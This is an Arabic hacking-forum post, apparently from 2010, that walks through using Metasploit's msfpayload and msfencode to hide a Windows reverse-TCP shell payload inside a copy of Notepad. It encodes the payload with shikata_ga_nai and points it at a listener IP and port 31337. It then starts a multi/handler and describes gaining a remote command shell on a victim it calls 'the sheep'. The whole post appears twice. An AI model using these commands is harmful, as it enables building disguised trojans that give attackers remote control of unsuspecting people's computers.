BLACK.JaGuAr
02-26-2010, 06:36 PM
http://www.samygames.com/forumim/basmla/68565.gif
http://www.samygames.com/forumim/slam/6867867.gif
تحية لكم ياأعضاء منتديات جيوش الهكرز ، اليوم إن شاء الله راح نتناول موضوع جديد ولم يسبق وأن طرح يعني جميع الحقوق محفوظة لمنتديات جيوش الهكرز ....
مثل ماذكرنا لاحقا راح نقوم بتكوين ملف عبارة عن سيرفر وسوف نقوم بتشفيرة ومن ثم تجربة التبليغ ، تم تطبيق النظرية ببرنامج metasploit الإصدار رقم 3-3 لنتابع الشرح من خلال الصور
راح نستخدم أداة cygwin shell المرفقة مع البرنامج ونقوم بالوصول اليها وفتحها كما هو موضح في الصورة التالية:
http://www.aljyyosh.info/upfiles/DOp14956.jpg
بعد مانفتح الأداة نكتب الأمر التالي لمعاينة خيارات البايلودات المتاحة :
msfpayload -h
وسيتم تحديد استخدام البايلود المتاح كما في الصورة التالية :
http://www.aljyyosh.info/upfiles/cQO14956.jpg
بعد ذلك سنقوم باستعراض الأوامر المساعدة لأمر التشفير من خلال كتابتنا للكود التالي :
msfencode -h
وسوف تظهر لنا الأوامر المساعدة كما هو موضوح بالصورة التالية :
http://www.aljyyosh.info/upfiles/z3i14957.jpg
من خلال ماسبق سنقوم باستعراض قائمة التشفير المتاحة لإستخدام أفضلها ، ونقوم بكتابة الأمر التالي لعرض القائمة :
msfencode -l
وبموجب الأمر السابق سيتم ظهور قائمة بالتشفير سيتم استخدامنا لكود التشفير المحدد برقم 2 كما في الصورة التالية :
http://www.aljyyosh.info/upfiles/6lj15107.jpg
الأن حددنا نقطتين سيتم استخادمها وبقي لنا نقطة وهي معرفة خيارات module للأوامر المساعدة للأكسبلويت ، ونقوم باستعراضها من خلال الأمر التالي :
msfcli -h
وبموجب ذلك سوف تظهر لنا الأوامر المساعدة لعرض الخيارات كما بالصورة التالية :
http://www.aljyyosh.info/upfiles/Dv614957.jpg
سنقوم باستخدام الأمر s مع البايلود الذي حددناه في أول خطوة لعرض الخيارات ويهمنا فيها خيارات التبليغ ، ونطبق ذلك من خلال الأمر التالي :
msfpayload windows/shell/reverse_tcp s
من خلال الأمر السابق سوف تظهر لنا خيارات كما في الصورة التالية :
http://www.aljyyosh.info/upfiles/z3i14957.jpg
حلو الأن عرفنا كافة المعلومات إلي راح نحتاجها وبقي لنا قبل التطبيق ، أن نقوم بتوفير أي برنامج لنحوله إلى سيرفر ، أنا أخترت برنامج المفكرة تبع الويندوز ( notepad ) وسوف نقوم بتوفيرها من خلال نسخها من مجلد windows الموجود بالقرص سي ولصقها داخل مجلد ( black ) في برنامج الميتاسبلويت طبعا اسم المجلد عندي بلاك يعني بحسب المستخدم ، الصور التالية ستوضح لكم الفكرة بشكل ممتاز ، لنتابع
http://www.aljyyosh.info/upfiles/TgQ15107.jpg
http://www.aljyyosh.info/upfiles/ZOk15107.jpg
الأن نجي لأمر تطبيق النقاط السابقة بشكل كامل ، بمعنى تحديد بايلود التبليغ وكود التشفير والأي بي تبعنا او الهوست لإستقبال الإتصال بالإضافة إلى تحديد المنفذ ، ويتم كل ذلك من خلال كتابتنا للأمر التالي :
msfpayload windows/shell/reverse_tcp LHOST=89.189.94.49 LPORT=31337 R | msfencode -x NOTEPAD.exe -t exe -e x86/shikata_ga_nai -o reverseNOTEPAD.exe
مثل ماتشوفوا حددنا كافة الخيارات بالإضافة إلى صيفة الملف الناتج وهو تنفيذي ، والصورة التالية توضح تنفيذنا للأمر
http://www.aljyyosh.info/upfiles/MaO15107.jpg
وحتى نتأكد من أنه تم تنفيذ الأمر نذهب لمجلد المستخدم داخل مجلدات برنامج الميتا في نفس المكان الذي لصقنا فيه المفكرة وفي حالة نجاح الأمر بإذن الله سوف تظهر لنا النتيجة كما بالصورة التالية
http://www.aljyyosh.info/upfiles/KMp15107.jpg
مثل ماشفنا العملية نجحت والحمد لله وأصبح لدينا مفكرتين وحدة تبع الوبندوز الأصل والأخرى نحن قمنا بتكوينها ، وفيما يلي صورة توضح المقارنة بين المفكرتين وهي تدل على أن النسخة الذي قمنا بتكوينها مطابقة للنسخة الأصلية ....
http://www.aljyyosh.info/upfiles/hQF15215.jpg
ياسلام شغل نظيف جدا ، الأن نقوم وقبل تجريب التبليغ نقوم بكتابة الكود التالي لتشغيل الأكسبلويت :
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=89.189.94.49 LPORT=31337 E
إذا كانت خطواتنا صح سوف يظهر لنا قبول التنفيذ كما في الصورة التالية :
http://www.aljyyosh.info/upfiles/rO815215.jpg
ياسلام تم تشغيل الإكسبلويت ، الأن الأكسبلويت بانتظار التبليغ ، وكيف يجي التبليغ ؟؟؟ طبعا يجي اذا قمنا بفتح السيرفر الذي قمنا بتكوينه وهو المفكرة المزورة ، والصورتين التالية توضح ماذا يحدث عند فتح السيرفر ووصول التبليغ وعملية التطبيق
http://www.aljyyosh.info/upfiles/Cq715215.jpg
الصورة السابقة توضح تطبيق الأكسبلويت وظهور التبليغ والمنفذ المفتوح ومن ثم ظهور نافذة دوس الخروف وبالتالي امكانية تطبيقنا لكافة اوامر الدوس على جهاز الخروف ..
http://www.aljyyosh.info/upfiles/kdV15215.jpg
نسأل الله أن نكون قد وفقنا بشرح الموضوع ، وأذكر بأن جميع الحقوق محفوظة لمنتديات جيوش الهكرز ، وإلى لقاء أخر إن شاء الله في موضوع حصري جديد
ودمتم سالمين
http://www.samygames.com/forumim/slam/6867867.gif
تحية لكم ياأعضاء منتديات جيوش الهكرز ، اليوم إن شاء الله راح نتناول موضوع جديد ولم يسبق وأن طرح يعني جميع الحقوق محفوظة لمنتديات جيوش الهكرز ....
مثل ماذكرنا لاحقا راح نقوم بتكوين ملف عبارة عن سيرفر وسوف نقوم بتشفيرة ومن ثم تجربة التبليغ ، تم تطبيق النظرية ببرنامج metasploit الإصدار رقم 3-3 لنتابع الشرح من خلال الصور
راح نستخدم أداة cygwin shell المرفقة مع البرنامج ونقوم بالوصول اليها وفتحها كما هو موضح في الصورة التالية:
http://www.aljyyosh.info/upfiles/DOp14956.jpg
بعد مانفتح الأداة نكتب الأمر التالي لمعاينة خيارات البايلودات المتاحة :
msfpayload -h
وسيتم تحديد استخدام البايلود المتاح كما في الصورة التالية :
http://www.aljyyosh.info/upfiles/cQO14956.jpg
بعد ذلك سنقوم باستعراض الأوامر المساعدة لأمر التشفير من خلال كتابتنا للكود التالي :
msfencode -h
وسوف تظهر لنا الأوامر المساعدة كما هو موضوح بالصورة التالية :
http://www.aljyyosh.info/upfiles/z3i14957.jpg
من خلال ماسبق سنقوم باستعراض قائمة التشفير المتاحة لإستخدام أفضلها ، ونقوم بكتابة الأمر التالي لعرض القائمة :
msfencode -l
وبموجب الأمر السابق سيتم ظهور قائمة بالتشفير سيتم استخدامنا لكود التشفير المحدد برقم 2 كما في الصورة التالية :
http://www.aljyyosh.info/upfiles/6lj15107.jpg
الأن حددنا نقطتين سيتم استخادمها وبقي لنا نقطة وهي معرفة خيارات module للأوامر المساعدة للأكسبلويت ، ونقوم باستعراضها من خلال الأمر التالي :
msfcli -h
وبموجب ذلك سوف تظهر لنا الأوامر المساعدة لعرض الخيارات كما بالصورة التالية :
http://www.aljyyosh.info/upfiles/Dv614957.jpg
سنقوم باستخدام الأمر s مع البايلود الذي حددناه في أول خطوة لعرض الخيارات ويهمنا فيها خيارات التبليغ ، ونطبق ذلك من خلال الأمر التالي :
msfpayload windows/shell/reverse_tcp s
من خلال الأمر السابق سوف تظهر لنا خيارات كما في الصورة التالية :
http://www.aljyyosh.info/upfiles/z3i14957.jpg
حلو الأن عرفنا كافة المعلومات إلي راح نحتاجها وبقي لنا قبل التطبيق ، أن نقوم بتوفير أي برنامج لنحوله إلى سيرفر ، أنا أخترت برنامج المفكرة تبع الويندوز ( notepad ) وسوف نقوم بتوفيرها من خلال نسخها من مجلد windows الموجود بالقرص سي ولصقها داخل مجلد ( black ) في برنامج الميتاسبلويت طبعا اسم المجلد عندي بلاك يعني بحسب المستخدم ، الصور التالية ستوضح لكم الفكرة بشكل ممتاز ، لنتابع
http://www.aljyyosh.info/upfiles/TgQ15107.jpg
http://www.aljyyosh.info/upfiles/ZOk15107.jpg
الأن نجي لأمر تطبيق النقاط السابقة بشكل كامل ، بمعنى تحديد بايلود التبليغ وكود التشفير والأي بي تبعنا او الهوست لإستقبال الإتصال بالإضافة إلى تحديد المنفذ ، ويتم كل ذلك من خلال كتابتنا للأمر التالي :
msfpayload windows/shell/reverse_tcp LHOST=89.189.94.49 LPORT=31337 R | msfencode -x NOTEPAD.exe -t exe -e x86/shikata_ga_nai -o reverseNOTEPAD.exe
مثل ماتشوفوا حددنا كافة الخيارات بالإضافة إلى صيفة الملف الناتج وهو تنفيذي ، والصورة التالية توضح تنفيذنا للأمر
http://www.aljyyosh.info/upfiles/MaO15107.jpg
وحتى نتأكد من أنه تم تنفيذ الأمر نذهب لمجلد المستخدم داخل مجلدات برنامج الميتا في نفس المكان الذي لصقنا فيه المفكرة وفي حالة نجاح الأمر بإذن الله سوف تظهر لنا النتيجة كما بالصورة التالية
http://www.aljyyosh.info/upfiles/KMp15107.jpg
مثل ماشفنا العملية نجحت والحمد لله وأصبح لدينا مفكرتين وحدة تبع الوبندوز الأصل والأخرى نحن قمنا بتكوينها ، وفيما يلي صورة توضح المقارنة بين المفكرتين وهي تدل على أن النسخة الذي قمنا بتكوينها مطابقة للنسخة الأصلية ....
http://www.aljyyosh.info/upfiles/hQF15215.jpg
ياسلام شغل نظيف جدا ، الأن نقوم وقبل تجريب التبليغ نقوم بكتابة الكود التالي لتشغيل الأكسبلويت :
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=89.189.94.49 LPORT=31337 E
إذا كانت خطواتنا صح سوف يظهر لنا قبول التنفيذ كما في الصورة التالية :
http://www.aljyyosh.info/upfiles/rO815215.jpg
ياسلام تم تشغيل الإكسبلويت ، الأن الأكسبلويت بانتظار التبليغ ، وكيف يجي التبليغ ؟؟؟ طبعا يجي اذا قمنا بفتح السيرفر الذي قمنا بتكوينه وهو المفكرة المزورة ، والصورتين التالية توضح ماذا يحدث عند فتح السيرفر ووصول التبليغ وعملية التطبيق
http://www.aljyyosh.info/upfiles/Cq715215.jpg
الصورة السابقة توضح تطبيق الأكسبلويت وظهور التبليغ والمنفذ المفتوح ومن ثم ظهور نافذة دوس الخروف وبالتالي امكانية تطبيقنا لكافة اوامر الدوس على جهاز الخروف ..
http://www.aljyyosh.info/upfiles/kdV15215.jpg
نسأل الله أن نكون قد وفقنا بشرح الموضوع ، وأذكر بأن جميع الحقوق محفوظة لمنتديات جيوش الهكرز ، وإلى لقاء أخر إن شاء الله في موضوع حصري جديد
ودمتم سالمين